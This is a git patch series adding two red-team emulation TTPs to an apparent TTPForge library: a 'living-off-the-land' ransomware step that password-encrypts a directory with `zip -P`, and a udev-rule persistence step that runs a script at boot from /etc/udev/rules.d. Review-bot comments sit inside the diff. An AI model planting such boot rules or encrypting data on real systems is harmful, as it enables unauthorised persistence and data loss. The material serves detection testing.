From 33a9de299cbc0ba12a665f121b3ea4795b3bde8c Mon Sep 17 00:00:00 2001
From: gerbsec
Date: Tue, 27 Aug 2024 12:18:49 -0400
Subject: [PATCH 1/4] Little late but a few TTPs :)
---
ttps/impact/lotl-ransomware/README.md | 51 ++++++++++++++++
.../lotl-ransomware/lotl-ransomware.yaml | 34 +++++++++++
.../linux/udev-persistence/README.md | 58 +++++++++++++++++++
.../udev-persistence/udev-persistence.yaml | 38 ++++++++++++
4 files changed, 181 insertions(+)
create mode 100644 ttps/impact/lotl-ransomware/README.md
create mode 100644 ttps/impact/lotl-ransomware/lotl-ransomware.yaml
create mode 100644 ttps/persistence/linux/udev-persistence/README.md
create mode 100644 ttps/persistence/linux/udev-persistence/udev-persistence.yaml
diff --git a/ttps/impact/lotl-ransomware/README.md b/ttps/impact/lotl-ransomware/README.md
new file mode 100644
index 0000000..9336706
--- /dev/null
+++ b/ttps/impact/lotl-ransomware/README.md
@@ -0,0 +1,51 @@ +# LOTL Ransomware Encryption + +![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) + +This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors. + +## Arguments + +- **target_dir**: The directory to encrypt. + + Default: /dev/shm + +- **encryption_key**: The password used to encrypt the directory. + + Default: password + +## Requirements + +1. Access to a Linux system where the `zip` and `unzip` commands are available. +2. Permission to modify files within the target directory. + +## Examples + +You can run the TTP using the following command (adjust arguments as needed): + +```bash +ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ + --arg target_dir="/path/to/target/dir" \ + --arg encryption_key="your_encryption_key" +``` + +## Steps + +1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password. + + ```bash + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + ``` + +1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. + + ```bash + unzip -P {{ .Args.encryption_key }} ttpforge.zip + ``` + +## MITRE ATT&CK Mapping + +- **Tactics**: + - TA0040 Impact +- **Techniques**: + - T1486 Data Encrypted for Impact diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml new file mode 100644 index 0000000..e1e64c5 --- /dev/null +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml 
@@ -0,0 +1,34 @@ +--- +api_version: 2.0 +uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9 +name: "LOTL Ransomware" +description: | + "Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine." + +args: + - name: target_dir + decription: The directory which we will encrypt. + default: /dev/shm + - name: encryption_key + description: The key which we will use to encrypt the data with. + default: password + +requirements: + platforms: + - os: linux + +mitre: + tactics: + - "TA0040 Impact" + techniques: + - "T1486 Data Encrypted for Impact" + +steps: + - name: encrypt_dir + description: Encrypt provided directory + inline: | + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + + cleanup: + inline: | + unzip -P {{ .Args.encryption_key }} ttpforge.zip diff --git a/ttps/persistence/linux/udev-persistence/README.md b/ttps/persistence/linux/udev-persistence/README.md new file mode 100644 index 0000000..7bbf31a --- /dev/null +++ b/ttps/persistence/linux/udev-persistence/README.md 
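Review bot: The `target_dir` argument's description key is misspelled `decription:` (the `encryption_key` entry right below spells it correctly), so the schema will either reject the arg or silently drop its help text; change it to `description: The directory which we will encrypt.`. The cleanup does not restore anything as far as I can tell: `zip -r` drops the leading slash from stored paths, so `unzip` extracts a copy under `./dev/shm` relative to the working directory rather than back into the original location, and `ttpforge.zip` is never deleted, so add `rm -f ttpforge.zip` to the cleanup so the encrypted archive is not left on disk as a leftover artifact (PATCH 4/4 touches the same line but only adds `-o`, which does not address either point). Because the key is passed with `-P`, it is visible in the process list and shell history; that is worth stating in the description, since it is one of the observable artifacts a detection exercise built on this TTP would key on. The `description: |` block scalar also keeps the surrounding double quotes as literal text — drop them or use a plain scalar.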
@@ -0,0 +1,58 @@ +# UDEV Persistence Technique + +![Meta TTP](https://img.shields.io/badge/Meta_TTP-red) + +This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization. + +## Arguments + +- **target_path**: The path where the script and udev rule will be created. + + Default: /dev + +## Requirements + +1. Access to a Linux system with permissions to modify udev rules. +1. Ability to write files in critical system directories. + +## Examples + +You can run the TTP using the following command (adjust arguments as needed): + +```bash +ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \ + --arg target_path="/your/custom/path" +``` + +## Steps + +1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot. + + ```bash + #!/bin/bash + echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh + chmod 0600 {{ .Args.target_path }}/udev.sh + ``` + +1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time. + + ```bash + echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules + ``` + +## Cleanup + +1. **remove_udev_rule**: Deletes the udev rule from the system. + + ```bash + rm /etc/udev/rules.d/75-persistence.rules + ``` + +## MITRE ATT&CK Mapping + +- **Tactics**: + - TA0003 Persistence +- **Techniques**: + - T1546 Event Triggered Execution +- **Subtechniques**: + - T1546.004 Unix Shell Configuration Modification diff --git a/ttps/persistence/linux/udev-persistence/udev-persistence.yaml b/ttps/persistence/linux/udev-persistence/udev-persistence.yaml new file mode 100644 index 0000000..904d3d6 
--- /dev/null +++ b/ttps/persistence/linux/udev-persistence/udev-persistence.yaml @@ -0,0 +1,38 @@ +--- +api_version: 2.0 +uuid: 96c74a6e-ecec-4559-846e-8027e1612a33 +name: "UDEV Persistence Technique" +description: | + "This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access." + +args: + - name: target_path + description: The path where the script and udev rule will be created. + default: /dev + +requirements: + platforms: + - os: linux + +mitre: + tactics: + - "TA0003 Persistence" + techniques: + - "T1546 Event Triggered Execution" + subtechniques: + - "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification" +steps: + - name: create_persistence_script + decription: Create the script that will be executed at boot. + create_file: {{ .Args.target_path }}/udev.sh + contents: + touch /root/exploited + mode: 0600 + cleanup: default + + - name: add_udev_rule + description: Add a udev rule to trigger the script at boot when /dev/random is loaded. + create_file: "/etc/udev/rules.d/75-persistence.rules" + contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'" + cleanup: + remove_path: "/etc/udev/rules.d/75-persistence.rules" From b087cbf42451efaf34a5b24226762eee6e503ab3 Mon Sep 17 00:00:00 2001 From: gerbsec Date: Tue, 27 Aug 2024 12:23:25 -0400 Subject: [PATCH 2/4] d --- ttps/impact/lotl-ransomware/lotl-ransomware.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml index e1e64c5..a3262af 100644 --- a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml 
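Review bot: The `create_persistence_script` step misspells its `description` key as `decription:` (the `add_udev_rule` step spells it correctly), so the step's description will be dropped or rejected by the schema; change it to `description: Create the script that will be executed at boot.`. The cleanup is incomplete: the rule file is removed and, assuming `cleanup: default` on `create_file` deletes the created file, so is the script, but the marker the script creates (`touch /root/exploited`) is left behind on any host where the rule fired, so add a cleanup that deletes it, e.g. `remove_path: /root/exploited`. The MITRE mapping to T1546.004 (Unix Shell Configuration Modification) is a poor fit for a udev rule; ATT&CK has since added a dedicated sub-technique, T1546.017 Udev Rules, which is the more accurate mapping — confirm against the current matrix before changing it. `create_file:` for the script step takes an unquoted value starting with `{{`, which only parses if TTPForge renders the template before YAML parsing; the rule step quotes its path, so quoting this one too (`create_file: "{{ .Args.target_path }}/udev.sh"`) keeps the two consistent and robust.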
@@ -11,7 +11,7 @@ args: default: /dev/shm - name: encryption_key description: The key which we will use to encrypt the data with. - default: password + default: password requirements: platforms: @@ -27,8 +27,8 @@ steps: - name: encrypt_dir description: Encrypt provided directory inline: | - zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} - + zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }} + cleanup: inline: | unzip -P {{ .Args.encryption_key }} ttpforge.zip From 7d75d398a74d6050e223257be17663873bcf8896 Mon Sep 17 00:00:00 2001 From: gerbsec <67713732+gerbsec@users.noreply.github.com> Date: Mon, 16 Sep 2024 11:08:00 -0400 Subject: [PATCH 3/4] Update README.md --- ttps/impact/lotl-ransomware/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ttps/impact/lotl-ransomware/README.md b/ttps/impact/lotl-ransomware/README.md index 9336706..33a9c1a 100644 --- a/ttps/impact/lotl-ransomware/README.md +++ b/ttps/impact/lotl-ransomware/README.md @@ -24,7 +24,7 @@ This TTP leverages the `zip` command available on Linux systems to encrypt files You can run the TTP using the following command (adjust arguments as needed): ```bash -ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.yaml \ +ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml \ --arg target_dir="/path/to/target/dir" \ --arg encryption_key="your_encryption_key" ``` @@ -40,7 +40,7 @@ ttpforge run forgearmory//impact/data-encrypt/LOTL-ransomware/LOTL-ransomware.ya 1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory. ```bash - unzip -P {{ .Args.encryption_key }} ttpforge.zip + unzip -o -P {{ .Args.encryption_key }} ttpforge.zip ``` ## MITRE ATT&CK Mapping From ee585af9b339492d781b3bb968bc5a48a6902eec Mon Sep 17 00:00:00 2001 
From: gerbsec <67713732+gerbsec@users.noreply.github.com> Date: Mon, 16 Sep 2024 11:08:17 -0400 Subject: [PATCH 4/4] Update lotl-ransomware.yaml --- ttps/impact/lotl-ransomware/lotl-ransomware.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml index a3262af..53c1ae1 100644 --- a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml +++ b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml @@ -31,4 +31,4 @@ steps: cleanup: inline: | - unzip -P {{ .Args.encryption_key }} ttpforge.zip + unzip -o -P {{ .Args.encryption_key }} ttpforge.zip